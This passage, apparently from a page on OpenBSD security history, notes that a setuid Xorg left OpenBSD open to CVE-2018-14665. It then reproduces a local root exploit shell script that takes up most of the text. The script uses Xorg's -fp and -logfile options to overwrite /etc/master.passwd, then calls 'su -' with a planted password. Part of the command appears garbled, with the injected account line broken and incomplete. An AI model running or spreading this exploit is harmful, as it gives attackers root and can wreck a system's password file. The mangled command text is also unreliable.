Rootless Xorg
Despite having a rootless Xorg since 2014, it was was kept setuid to make non-modesetting driver work, making OpenBSD vulnerable to CVE-2018-14665:
# local privilege escalation in X11 currently
# unpatched in OpenBSD 6.4 stable - exploit
# uses cve-2018-14665 to overwrite files as root.
# Impacts Xorg 1.19.0 - 1.20.2 which ships setuid
# and vulnerable in default OpenBSD.
# -
echo [+] OpenBSD 6.4-stable local root exploit
cd /etc
Xorg -fp
&:/root:/bin/ksh' -logfile master.passwd :1 &
sleep 5
pkill Xorg
echo [-] dont forget to mv and chmod /etc/master.passwd.old back
echo [+] type 'Password1' and hit enter for root
su -